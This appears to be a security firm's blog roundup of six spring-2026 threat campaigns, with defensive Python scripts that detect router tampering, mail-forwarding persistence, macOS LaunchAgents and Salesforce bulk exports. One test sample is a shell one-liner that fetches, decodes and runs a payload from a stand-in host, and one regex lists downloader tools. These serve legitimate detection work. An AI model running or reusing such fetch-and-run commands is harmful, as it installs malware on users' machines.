
The Spring 2026 APT Roundup: Six Campaigns Defining the Threat Landscape Right Now

Lorikeet Security Team April 27, 2026 16 min read

The first four months of 2026 produced a dense, unusually consequential APT cycle. China's Salt Typhoon expanded from US telecom espionage into a global telecom mapping campaign hitting Singapore, Norway, and Canada. Russia's APT28 ran an aggressive Roundcube webmail campaign against Ukrainian institutions and accidentally left their entire toolkit on a publicly accessible server. North Korea's Lazarus cluster pulled more than $500M in DeFi heists in a single two-week window and shipped a polished new macOS implant aimed at crypto-firm executives. Iranian MOIS and IRGC-affiliated actors entered a clear post-strike retaliation phase against US and Israeli targets. ShinyHunters and the related UNC6395 cluster turned the Salesforce / Salesloft Drift compromise into a ~1.5-billion-record SaaS extortion campaign. And the structural problem of internet-facing edge devices kept producing unpatched-zero-day disasters at Fortinet and Ivanti.

This is a synthesized roundup of those six campaigns — what each is doing, who is doing it, what the TTPs look like, and why each one matters for defenders this quarter. Where attribution is contested or evidence is partial, we say so explicitly. Sources are inline.


Actor 01

Salt Typhoon — Telecom Espionage Goes Global

Names: Salt Typhoon (Microsoft); GhostEmperor (Kaspersky lineage); RedMike (Recorded Future)
Attribution: Operated by China's Ministry of State Security per joint US/UK/Canada/Australia/NZ assessments. High-confidence and uncontested at the state-actor level.
Recent activity: February 2026: all four of Singapore's national telecoms confirmed breached. Norway disclosed multiple telecom intrusions the same month. Canada confirmed a previously undisclosed mid-February intrusion at an unnamed carrier via three Cisco devices.

The standout development this quarter is the geographic expansion. The 2024 Salt Typhoon revelations focused on US carriers (AT&T, Verizon, T-Mobile, Lumen). February 2026 confirmed that the same actor has been doing the same thing globally — Singapore, Norway, Canada — with a clear pattern of targeting carriers in NATO-aligned, Five Eyes-adjacent, and strategic-ally jurisdictions.

FBI Deputy Assistant Director Michael Machtinger publicly stated in February that Salt Typhoon's threat is "still very much present" — meaning the 2024 US victims were never fully evicted. Senator Maria Cantwell (Senate Commerce Committee) wrote in February that there is "no reason to think the attack has been completely remediated." If you internalize one thing from this entire roundup: the dwell time on this campaign is years, eviction is hard, and the network gear it lives on is invisible to your EDR.

TTPs

  • Initial access: unpatched Cisco IOS XE devices (CVE-2023-20198 / 20273 and successors), edge routers, provider-edge switches.
  • Post-exploitation: GhostSpider modular backdoor, Masol RAT, custom Cisco IOS implants modifying running-config and TACACS+/RADIUS handlers to harvest credentials in transit.
  • Persistence: lives in network-device firmware where EDR cannot reach; abuses lawful-intercept (CALEA) interfaces on carrier gear to access call-detail records and wiretap surfaces.
  • Exfiltration: metadata and signaling traffic siphoned over operator-trusted GRE tunnels to attacker infrastructure.
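
Because the implant lives on the router rather than on a host, the most reliable artifact a defender actually holds is the running-config itself. The following is an added example (not from the page, Cisco, or any vendor tool) that diffs a current running-config against a known-good baseline and flags the three changes the TTPs above describe: new privilege-15 local users, changed AAA/TACACS+/RADIUS servers, and new GRE tunnels. Both configs are constructed samples.

```python
"""Baseline-diff a Cisco IOS running-config for the tampering described above.

Added example; not from the page, Cisco, or any vendor tool. The two configs
are constructed. The rules encode the roundup's TTPs: new privilege-15 local
users, changed AAA/TACACS+/RADIUS servers (credential harvesting in transit),
and new GRE tunnels (exfiltration over operator-trusted paths).
"""
import re
from dataclasses import dataclass

# Constructed known-good snapshot. Take yours from config management or an
# offline backup, never from the device you are checking.
BASELINE = """\
hostname pe-edge-01
username netops privilege 15 secret 9 $9$abc
aaa new-model
aaa authentication login default group tacacs+ local
tacacs server ISE-1
 address ipv4 10.10.0.5
interface GigabitEthernet0/0/0
 ip address 203.0.113.2 255.255.255.252
logging host 10.10.0.9
ip http secure-server
"""

# Constructed "current" config showing the drift to hunt for.
CURRENT = """\
hostname pe-edge-01
username netops privilege 15 secret 9 $9$abc
username cisco_tac_admin privilege 15 secret 9 $9$zzz
aaa new-model
aaa authentication login default group tacacs+ local
tacacs server ISE-1
 address ipv4 198.51.100.77
interface GigabitEthernet0/0/0
 ip address 203.0.113.2 255.255.255.252
interface Tunnel99
 tunnel source GigabitEthernet0/0/0
 tunnel destination 198.51.100.200
 tunnel mode gre ip
ip http secure-server
"""

@dataclass(frozen=True)
class Finding:
    severity: str
    reason: str
    detail: str

def parse_blocks(cfg: str) -> dict:
    """Group an IOS config into {top-level line: [indented sub-lines]}."""
    blocks, current = {}, None
    for raw in cfg.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue
        if raw.startswith(" ") and current is not None:
            blocks[current].append(raw.strip())
        else:
            current = raw.strip()
            blocks.setdefault(current, [])
    return blocks

def audit(baseline: str, current: str) -> list:
    base, cur = parse_blocks(baseline), parse_blocks(current)
    findings = []
    for line, sub in cur.items():
        if line in base and base[line] == sub:
            continue                      # unchanged block
        detail = line + (": " + " ; ".join(sub) if sub else "")
        if re.match(r"username \S+ privilege 15", line):
            findings.append(Finding("high", "new privilege-15 local user", detail))
        elif line.startswith(("tacacs server", "radius server", "aaa ")):
            findings.append(Finding("high", "AAA/TACACS+/RADIUS change", detail))
        elif line.startswith("interface Tunnel") and any("mode gre" in s for s in sub):
            findings.append(Finding("high", "new GRE tunnel", detail))
        else:
            findings.append(Finding("info", "unreviewed drift", detail))
    for line in base:
        if line not in cur:               # e.g. logging quietly removed
            findings.append(Finding("medium", "baseline line removed", line))
    return findings

if __name__ == "__main__":
    for f in audit(BASELINE, CURRENT):
        print(f"[{f.severity}] {f.reason}: {f.detail}")
```

The baseline has to come from somewhere the actor cannot edit (config management, an offline backup); a baseline pulled from the same box is only as trustworthy as the box. Note that a removed `logging host` line is reported too, because losing syslog is often the first thing an operator does before touching AAA.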

Sources: TechCrunch — who has been hacked; Dark Reading — Canada; CyberScoop — FBI on ongoing threat.

Actor 02

APT28 / Fancy Bear — Operation Roundish + the OPSEC Blunder

Names: APT28 (Mandiant); Fancy Bear (CrowdStrike); Forest Blizzard / STRONTIUM (Microsoft); Sednit (ESET)
Attribution: GRU Unit 26165. High-confidence, uncontested.
Recent activity: Jan-Mar 2026: exposed open directory at 203.161.50[.]145:8889 revealed the full Roundcube exploitation toolkit. Mar-Apr: 170+ Ukrainian prosecutor and law-enforcement accounts compromised. Parallel reporting on Microsoft Office CVE-2026-21509 / -32202 and PRISMEX malware deployment.

Two developments stand out this quarter, the first of a kind that rarely happens to GRU operations. An active operator left a server's directory listing open between January and March, and Hunt.io and Ctrl-Alt-Intel pulled out the complete Roundcube webmail exploitation toolkit, stolen credentials, 2FA seeds, and operator activity logs. It is the rare case where defenders got near-real-time visibility into a live GRU operation.

Second, CERT-UA documented an aggressive intensification of Roundcube and Office-document attacks against Ukrainian municipal and prosecutorial institutions: 170+ accounts at the Specialized Prosecutor's Office in the Field of Defense, the Asset Recovery and Management Agency, Kyiv-area law enforcement, and a parallel set of compromises in Romania, Greece, Serbia, Bulgaria, and North Macedonia. The targeting tracks Russia's military priority list precisely — anyone supplying, training, or prosecuting on behalf of Ukraine.

TTPs

  • Initial access: Roundcube XSS/RCE chains against internet-facing webmail; weaponized Office documents (CVE-2026-21509 + the incomplete-patch follow-up CVE-2026-32202); credential phishing with adversary-in-the-middle.
  • Post-exploitation: PRISMEX implant, increasingly cloud-native C2 hosted on legitimate cloud providers.
  • Persistence: OAuth token theft, app passwords, mailbox forwarding rules.
  • Exfiltration: webmail-native — pulls inbox contents directly via IMAP after credential capture, which looks identical to legitimate user activity.
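
The persistence item above is the one that survives a password reset, so it is worth hunting directly. The following is an added example (not from the page, CERT-UA, or Roundcube) that audits Sieve filter scripts, which is where Roundcube's managesieve plugin stores each user's rules, for external forwards and for rules that bury the notifications that would expose them. The scripts and the internal-domain set are constructed.

```python
"""Audit Sieve filter scripts for the forwarding-rule persistence described above.

Added example; not from the page, CERT-UA, or Roundcube. Roundcube's managesieve
plugin stores each user's filters as a Sieve script on the mail server, so a
dump of those scripts is the place to look for a rule that quietly copies mail
out or buries the alerts that would reveal it. The scripts and the internal
domain set are constructed.
"""
import re
from dataclasses import dataclass

INTERNAL_DOMAINS = {"example.gov.ua"}      # assumption: the mail domains you operate
ALERT_WORDS = ("security", "password", "mfa", "2fa", "helpdesk", "it-support")
HIDE_FOLDERS = ("trash", "deleted", "junk", "spam")

REDIRECT_RE = re.compile(r'redirect\s+((?::\w+\s+)*)"([^"]+)"')
RULE_RE = re.compile(
    r'if\s+(?:header|address)\s+:(?:contains|is|matches)\s+"[^"]+"\s+"([^"]+)"\s*\{([^}]*)\}',
    re.S)
FILEINTO_RE = re.compile(r'fileinto\s+"([^"]+)"')
DISCARD_RE = re.compile(r'\bdiscard\s*;')

@dataclass(frozen=True)
class SieveFinding:
    user: str
    reason: str
    detail: str

def audit_script(user: str, script: str) -> list:
    findings = []
    for m in REDIRECT_RE.finditer(script):
        flags, addr = m.group(1), m.group(2).lower()
        domain = addr.rsplit("@", 1)[-1]
        if domain not in INTERNAL_DOMAINS:
            reason = "external redirect"
            if ":copy" in flags:
                reason += " with :copy (victim keeps seeing mail, so nothing looks wrong)"
            findings.append(SieveFinding(user, reason, addr))
    for m in RULE_RE.finditer(script):
        needle, body = m.group(1).lower(), m.group(2)
        hides = DISCARD_RE.search(body) or any(
            f.lower() in HIDE_FOLDERS for f in FILEINTO_RE.findall(body))
        if hides and any(w in needle for w in ALERT_WORDS):
            findings.append(SieveFinding(user, "hides security notifications", needle))
    return findings

def audit_all(scripts: dict) -> list:
    return [f for user, script in scripts.items() for f in audit_script(user, script)]

# Constructed samples, keyed by mailbox owner.
SCRIPTS = {
    "o.shevchenko": (
        'require ["fileinto"];\n'
        'if header :contains "subject" "newsletter" { fileinto "Lists"; }\n'
    ),
    "i.bondar": (
        'require ["fileinto", "copy"];\n'
        'redirect :copy "archive-sync@mail-backup-service.example";\n'
        'if header :contains "subject" "password" { fileinto "Trash"; }\n'
        'if address :contains "from" "security" { discard; }\n'
    ),
}

if __name__ == "__main__":
    for f in audit_all(SCRIPTS):
        print(f"{f.user}: {f.reason} -> {f.detail}")
```

The `:copy` case is the one to prioritise: a plain `redirect` moves the message and the victim notices missing mail, whereas `redirect :copy` leaves the inbox intact and looks, from the victim's side, exactly like the IMAP-native exfiltration described above.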

The defender lesson is straightforward: if you run Roundcube or any internet-facing webmail, treat it as actively-targeted critical infrastructure. The patching latency that worked in 2022 is not survivable in 2026.

Sources: Hunt.io — Operation Roundish; Ctrl-Alt-Intel — FancyBear OPSEC blunder; The Record — Ukraine prosecutor campaign; The Hacker News — PRISMEX.

Actor 03

Lazarus / TraderTraitor — "Mach-O Man" and $500M+ in DeFi Heists

Names: Lazarus (umbrella); TraderTraitor, APT38, BlueNoroff, Famous Chollima (sub-clusters); Diamond Sleet / Jade Sleet (Microsoft); Hidden Cobra (CISA)
Attribution: DPRK Reconnaissance General Bureau. State-level attribution: high-confidence. Sub-cluster delineation: contested between vendors.
Recent activity: Mar 1: Bitrefill compromise. Apr 18: ~$292M stolen from Kelp DAO. A separate exploit of the Drift DeFi protocol (no relation to the Salesloft Drift integration discussed under Actor 05) pushed combined April losses past $500M. Apr 22: CertiK discloses the "Mach-O Man" macOS campaign targeting fintech and crypto executives.

The cumulative theft attributed to Lazarus since 2017 is now estimated at $6.7 billion. This is a state revenue program that funds the DPRK weapons program, not a hobby. The April 2026 spike is consistent with the longer-run trend — quarterly take is up, target acquisition is more sophisticated, and macOS is no longer a safe haven for crypto-firm leadership.

The "Mach-O Man" campaign, disclosed by CertiK on April 22, is the most operationally interesting development. The initial-access tradecraft is ClickFix: Telegram-delivered fake meeting invites that appear to be Zoom, Teams, or Meet, instructing the target to paste a "fix" command into Terminal to resolve a fake audio or camera issue. The target pastes, the implant lands, and the operator has shell-level access on the executive's Mac, which means access to every corporate SaaS session, signing key, and crypto wallet cached on it.

TTPs

  • Initial access: ClickFix social engineering via Telegram-impersonated meeting invites; targeted spear-phishing against executives at fintech and crypto firms.
  • Post-exploitation: modular macOS implant ("Mach-O Man") providing access to corporate SaaS, signing keys, and crypto wallets.
  • Persistence: abuse of legitimate macOS launch agents; the implant is engineered to self-erase post-objective, which is why incident timelines are hard to reconstruct.
  • Exfiltration: wallet seed extraction, OAuth token theft, signing-key abuse to authorize on-chain transactions from compromised admin sessions.
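
A pasted one-liner has to leave something behind to survive a reboot, and on macOS that is usually a LaunchAgent. The following is an added example (not from the page, CertiK, or ANY.RUN) that scores LaunchAgent plists on the traits of that pattern: a shell `-c` wrapper, a downloader or decoder on the command line, a payload under a temp path, and a label impersonating meeting software. The two plists are constructed and the scoring thresholds are judgement calls, not vendor indicators.

```python
"""Score macOS LaunchAgents for the ClickFix persistence pattern described above.

Added example; not from the page, CertiK, or ANY.RUN. A pasted "fix" command
typically fetches a payload, drops it somewhere writable, and registers a
LaunchAgent so it survives reboot. This scores each plist on traits of that
pattern. The two plists are constructed; the thresholds are judgement calls.
"""
import plistlib
import re
from dataclasses import dataclass
from pathlib import Path

TEMP_PATHS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/", "/Users/Shared/")
MEETING_BRANDS = ("zoom", "teams", "meet", "webex")
LEGIT_PREFIXES = ("us.zoom", "com.microsoft", "com.google", "com.cisco")
DOWNLOAD_OR_DECODE = re.compile(
    r"(curl|wget|base64\s+(-d|-D|--decode)|osascript|python3?\s+-c|nohup)", re.I)

@dataclass
class AgentFinding:
    label: str
    score: int
    reasons: list

def score_plist(data: bytes) -> AgentFinding:
    p = plistlib.loads(data)
    label = str(p.get("Label", "?"))
    args = [str(a) for a in p.get("ProgramArguments", [])] or [str(p.get("Program", ""))]
    cmd = " ".join(args)
    reasons = []
    if DOWNLOAD_OR_DECODE.search(cmd):
        reasons.append("downloader/decoder in command line")
    if args[0].endswith(("/sh", "/bash", "/zsh")) and "-c" in args:
        reasons.append("shell -c wrapper (typical of a pasted one-liner)")
    if any(t in cmd for t in TEMP_PATHS):
        reasons.append("runs from a temp or world-writable path")
    if any(b in label.lower() for b in MEETING_BRANDS) and not label.lower().startswith(LEGIT_PREFIXES):
        reasons.append("label impersonates meeting software")
    if p.get("RunAtLoad") and p.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive (restarts if killed)")
    return AgentFinding(label, len(reasons), reasons)

def scan_dir(directory: Path) -> list:
    """Score every plist in a LaunchAgents directory, worst first."""
    results = [score_plist(path.read_bytes()) for path in sorted(directory.glob("*.plist"))]
    return sorted(results, key=lambda r: r.score, reverse=True)

# Constructed samples, serialised with plistlib so the XML is well formed.
BENIGN = plistlib.dumps({
    "Label": "com.docker.helper",
    "ProgramArguments": ["/Applications/Docker.app/Contents/MacOS/com.docker.helper"],
    "RunAtLoad": True,
})
HOSTILE = plistlib.dumps({
    "Label": "com.zoom.audiofix",
    "ProgramArguments": ["/bin/sh", "-c",
                         "curl -fsSL https://invalid.example/fix | base64 -d > /tmp/.af; /tmp/.af"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

if __name__ == "__main__":
    for sample in (BENIGN, HOSTILE):
        r = score_plist(sample)
        print(f"{r.label}: score {r.score} {r.reasons}")
    for r in scan_dir(Path.home() / "Library" / "LaunchAgents"):
        if r.score >= 2:
            print(f"REVIEW {r.label}: {r.reasons}")
```

Run it against `~/Library/LaunchAgents` on a suspect machine; anything scoring 2 or more deserves a look at the referenced binary. Because the page notes the implant self-erases after reaching its objective, an empty LaunchAgents directory is not exonerating, and the shell history (`~/.zsh_history`) is the complementary artifact to pull for the pasted command itself.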

Sources: CoinDesk — Mach-O Man; CoinDesk — Bitrefill; SCMP — Kelp DAO; ANY.RUN — Mach-O Man technical analysis.

Actor 04

Iranian APTs — Post-Strike Retaliation Wave

Names: MuddyWater (Mango Sandstorm / Static Kitten); APT34 / OilRig (Hazel Sandstorm); IRGC-affiliated OT cluster (named in CISA AA26-097A)
Attribution: Iran's MOIS (MuddyWater, APT34) and IRGC (OT cluster). State-level attribution: high-confidence. The MuddyWater/APT34 line is sometimes blurred by analysts.
Trigger: Late February 2026: coordinated US-Israeli kinetic strikes against IRGC and MOIS leadership and nuclear infrastructure.
Recent activity: MuddyWater's RustyWater RAT against Israeli government, military, financial, telecom, and maritime sectors. Same actor with new Dindoor (Deno-based) and Fakeset (Python) implants on US bank, airport, nonprofit, and defense-adjacent targets. APT34 against Iraqi government via Veaty / Spearal (Dark Scepter cluster). Apr 7: CISA + FBI + NSA + EPA joint advisory AA26-097A on IRGC-affiliated OT/PLC targeting.

This is the most operationally urgent set of advisories in the spring window. CISA explicitly says targeting "has recently escalated, likely in response to hostilities," and the joint AA26-097A advisory names the water/wastewater, energy, and government-services sectors as priority targets. The initial-access pattern is depressingly familiar: internet-exposed Rockwell Automation / Allen-Bradley PLCs with default or weak credentials, the same play CyberAv3ngers ran against Unitronics PLCs in 2023.

The MuddyWater tradecraft evolution is interesting independently of the geopolitical trigger: RustyWater (Rust-based RAT, evasion-focused) is now in production deployment against Israeli targets, and Dindoor (Deno JavaScript runtime, deliberately unusual choice) plus Fakeset (Python) are seen on US targets. The Deno choice is operationally clever — most existing IOC and string-based detection assumes Node.js.

TTPs

  • Initial access: internet-exposed PLCs with default/weak credentials (the OT cluster); spear-phishing with weaponized Office documents (MuddyWater); multi-stage social engineering with long-lead persona development.
  • Post-exploitation: RustyWater (Rust), Dindoor (Deno), Fakeset (Python), Veaty / Spearal (older APT34 toolkit).
  • Persistence: in OT environments, modification of PLC project files and HMI displays — the goal is disruption, not just espionage.
  • Exfiltration: secondary to disruption in OT cases; standard HTTPS C2 from IT-side compromises.

If you operate water, wastewater, energy, or municipal-government infrastructure, treat AA26-097A as an immediate work item this week.

Sources: CISA Advisory AA26-097A; Trellix — Iranian Cyber Capability 2026; Rescana — RustyWater MuddyWater Israel campaign; Cybersecurity Dive — water/energy targeting.

Actor 05

ShinyHunters / UNC6040 (+ UNC6395) — SaaS Extortion at Industrial Scale

Names: ShinyHunters (extortion brand); UNC6040 (Mandiant cluster, vishing-led Salesforce intrusions); UNC6395 (Salesloft Drift OAuth-token cluster). Some overlap with Scattered Spider tradecraft per ReliaQuest, but the relationship is contested.
Attribution: Financially motivated criminal actor; APT-grade by virtue of impact and operational tempo, not state nexus.
Recent activity: Feb 2026: Wynn Resorts (~800K records claimed); Figure (~967K users). Mar 7-9: Salesforce advisory; ShinyHunters claims responsibility. Mar 2026: Telus + Telus Digital, ~1 PB claimed exfiltrated, $65M ransom demand. Cumulative Drift OAuth campaign: ~1.5B Salesforce records, 760 organizations.

ShinyHunters is the public-facing brand; the technical work is split across two distinct Mandiant-tracked clusters. UNC6040 runs the vishing-into-help-desk play, where the operator calls a target and walks them through approving a malicious Data Loader OAuth app; the full chain, from the call to bulk export, runs in 24-48 hours. UNC6395 runs the Salesloft Drift OAuth-token compromise: tokens stolen from a Salesloft GitHub compromise were used between August 8-18, 2025 to query Salesforce instances at ~760 organizations and pull ~1.5 billion records.

The two big lessons: SaaS supply-chain compromise via stolen OAuth tokens now achieves the blast radius previously reserved for the 2023-era MFT mass-exploits (MOVEit, GoAnywhere, Cleo). Help-desk vishing remains shockingly effective against Fortune 500 IT — the fact that this exists in 2026 is itself a finding. The FBI's recent FLASH alert is unusual in calling out two distinct UNC clusters under one extortion brand.

TTPs

  • Initial access (UNC6040): voice phishing — caller impersonates IT, walks the target through approving a malicious connected Data Loader app or surrendering MFA.
  • Initial access (UNC6395): stolen OAuth tokens for Salesloft Drift (the AI chatbot with broad Salesforce scopes).
  • Post-exploitation: weaponized legitimate Salesforce Data Loader / custom connected apps; Aura framework misconfiguration abuse.
  • Persistence: the connected app itself — survives password and MFA resets until the OAuth grant is revoked.
  • Exfiltration: SOQL queries via the Salesforce API, pulled to attacker infrastructure. Often invisible because it looks like normal API traffic.
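
The exfiltration item above is the detectable step: a malicious connected app pulling whole objects shows up in Salesforce's API event logs as a run of `query`/`queryMore` calls with large `ROWS_PROCESSED` counts under a client name nobody on the integrations team recognises. The following is an added example (not from the page, Mandiant, or Salesforce) that reads rows in the shape of the EventLogFile API event type and flags that pattern; it also serves the OAuth-grant review point made under Theme 02. The column names (TIMESTAMP, USER_NAME, CLIENT_NAME, ENTITY_NAME, METHOD_NAME, ROWS_PROCESSED), the allowlist, and the threshold are assumptions to map onto your own export, and the log lines are constructed.

```python
"""Spot Data Loader-style bulk exfiltration in Salesforce API event logs.

Added example; not from the page, Mandiant, or Salesforce. The column names
below are an assumption about the EventLogFile "API" export; check them
against your org's actual field list. The allowlist, threshold, and log
lines are constructed.
"""
import csv
import io
from collections import defaultdict
from dataclasses import dataclass

SENSITIVE = {"Account", "Contact", "Lead", "Case", "Opportunity", "User"}
# Assumption: the connected apps your integrations team actually owns.
KNOWN_CLIENTS = {"Marketing Cloud Connector", "Salesforce Data Loader", "SfdcInternalQueryApp"}
ROW_THRESHOLD = 10_000     # tune to your org's normal per-app daily volume

SAMPLE_LOG = """\
TIMESTAMP,USER_NAME,CLIENT_NAME,ENTITY_NAME,METHOD_NAME,ROWS_PROCESSED
20260307T01:02:10Z,integration@corp.example,Marketing Cloud Connector,Contact,query,2000
20260307T01:04:31Z,integration@corp.example,Marketing Cloud Connector,Contact,queryMore,2000
20260307T13:15:02Z,j.doe@corp.example,My Ticket Portal,Account,query,2000
20260307T13:15:09Z,j.doe@corp.example,My Ticket Portal,Account,queryMore,2000
20260307T13:15:17Z,j.doe@corp.example,My Ticket Portal,Contact,query,2000
20260307T13:15:25Z,j.doe@corp.example,My Ticket Portal,Contact,queryMore,2000
20260307T13:15:33Z,j.doe@corp.example,My Ticket Portal,Contact,queryMore,2000
20260307T13:15:41Z,j.doe@corp.example,My Ticket Portal,Case,query,2000
20260307T13:15:49Z,j.doe@corp.example,My Ticket Portal,Case,queryMore,2000
"""

@dataclass
class ExfilFinding:
    user: str
    client: str
    rows_sensitive: int
    reasons: list

def analyse(log_text: str) -> list:
    # (user, client) -> entity -> rows returned by read calls
    rows_by = defaultdict(lambda: defaultdict(int))
    for rec in csv.DictReader(io.StringIO(log_text)):
        if rec["METHOD_NAME"] in ("query", "queryMore", "retrieve"):
            key = (rec["USER_NAME"], rec["CLIENT_NAME"])
            rows_by[key][rec["ENTITY_NAME"]] += int(rec["ROWS_PROCESSED"] or 0)
    findings = []
    for (user, client), per_entity in rows_by.items():
        hit = sorted(e for e in per_entity if e in SENSITIVE)
        sensitive_rows = sum(per_entity[e] for e in hit)
        reasons = []
        if client not in KNOWN_CLIENTS:
            reasons.append(f"unrecognised connected app '{client}'")
        if sensitive_rows >= ROW_THRESHOLD:
            reasons.append(f"{sensitive_rows} rows pulled from {hit}")
        if reasons:
            findings.append(ExfilFinding(user, client, sensitive_rows, reasons))
    return findings

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f.user} via '{f.client}': " + "; ".join(f.reasons))
```

The point of keying on (user, client) rather than user alone is the persistence item above: the human's password and MFA are irrelevant once the grant exists, so the response is to revoke the connected app's OAuth grant (Setup, Connected Apps OAuth Usage) and then go looking for what it read, not to reset the user and move on.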

Sources: Cybersecurity Dive — FBI FLASH; SC World — 1.5B records via Drift; The Register — ShinyHunters claims; Mitiga — technical breakdown.

Actor 06

Edge-Device Zero-Day Exploitation Wave — Fortinet, Ivanti, Multiple Actors

Attribution: Multi-actor exploitation cluster, not a single group. Mandiant attributes the post-exploitation persistence to a "China-nexus espionage actor" with overlap to Volt Typhoon / UNC5221 lineage. Attribution to a specific named group is contested for some Q1 2026 Ivanti waves; CISA stays neutral on attribution.
Recent activity: Jan 29: Ivanti CVE-2026-1281 + CVE-2026-1340 (EPMM, both CVSS 9.8 RCE), both exploited before patch. Feb 6: Fortinet CVE-2026-21643 (FortiClient EMS, unauth RCE). Mar 31: watchTowr observes in-the-wild exploitation of CVE-2026-35616 (FortiClient EMS, CVSS 9.8) before the April 4 vendor advisory. Apr: Mandiant reports earlier victims seeing evolved persistence that survives firmware updates.

This is not a single campaign — it is the continuation of the structural problem we have been writing about for months: edge devices and management consoles are simultaneously (a) internet-exposed, (b) running custom firmware that EDR cannot see, and (c) trusted enough to push code to everything else they manage. The watchTowr finding is the recurring pattern that defenders should expect to keep happening: exploitation observed four days before the vendor advisory dropped, then opportunistic scanning during the patching gap, then long-tail compromises on unpatched instances for months afterward.

The Mandiant report on evolved persistence is the more concerning secondary finding: victims of the earlier Fortinet/Ivanti zero-days are seeing implants that survive firmware updates. If you patched in January or February and assumed remediation was complete, revisit that assumption with active hunting. Patching does not equal eviction for high-end actors on edge devices.

TTPs

  • Initial access: N-day and 0-day RCE in MDM consoles (Ivanti EPMM) and endpoint-management consoles (FortiClient EMS) — boxes that by definition manage all your other endpoints.
  • Post-exploitation: webshell drop, then movement to internal directory services; in some cases pushing malicious profiles back out to the very endpoints the compromised MDM/EMS was supposed to manage.
  • Persistence: firmware-resident implants, scheduled-task hiding, abuse of legitimate management agents.
  • Exfiltration: standard HTTPS to attacker infrastructure; in espionage cases, very low-volume staged pulls.

Sources: CyberScoop — Fortinet CVE-2026-35616; watchTowr — technical writeup; Tenable — Ivanti EPMM; CSO Online — evolved persistence.


Cross-Cutting Themes

Three patterns hold across these six campaigns. Each one corresponds to a structural problem in how we build and operate corporate IT in 2026, and each one has implications for how you should be testing your environment.

Theme 01: Edge devices, management consoles, and network gear remain the dominant initial-access vector for both nation-state and high-end criminal actors

Salt Typhoon lives on Cisco gear. APT28 lives in Roundcube. Iran lives in PLCs. The Fortinet/Ivanti cluster lives in MDM and EMS consoles. None of these boxes typically run EDR; all of them are internet-exposed by design. Until the architectural reality changes, this is where the breach is going to start. The continuous-pentesting work of treating edge and management surfaces as Tier-0 attack surface is now mandatory, not optional.

Theme 02: SaaS supply-chain and OAuth-token abuse has reached scale-equivalence with the 2023-era MFT mass-exploits

The Salesloft Drift compromise touched 760 organizations and ~1.5 billion Salesforce records off a single OAuth integration. ShinyHunters then layered vishing on top to extract from the same victim pool. Lazarus is using the same conceptual move on the macOS side — gain Terminal access once, harvest every SaaS session and signing key the executive has. The lesson for defenders: connected-app inventory and OAuth-grant review are now table-stakes, not advanced.

Theme 03: Post-disclosure does not equal post-incident

The most under-appreciated theme of this window is that Salt Typhoon victims from 2024 have not been evicted (FBI, February 2026), Fortinet/Ivanti victims are seeing implants that survive patches (Mandiant), and APT28's compromise of Ukrainian institutions continued even after researchers pulled the actor's own toolkit off its exposed server. Treat any "we have remediated" comms, yours or your vendors', with calibrated skepticism. The presumption should be that high-end actors stay until they are forcibly removed, not until they are publicly named.


Honest Uncertainty Notes

Where attribution is fuzzy in this roundup, we want it on the page. A few notes:

Continuous Testing Against the Threat Landscape That Actually Exists.

If your security testing cadence is built for the 2018 threat landscape, you are not testing against the actors that are actually compromising organizations like yours in 2026. Lorikeet Security's continuous pentesting model includes KEV-matched re-testing within hours of CVE disclosure, edge-device and OAuth-grant inventory as standard scope items, and adversary-simulation engagements aligned to current TTPs. Book a scoping call.


Lorikeet Security Team

Penetration Testing & Cybersecurity Consulting

We've completed 170+ security engagements across web apps, APIs, cloud infrastructure, and AI-generated codebases. Everything we publish here comes from patterns we see in real client work.
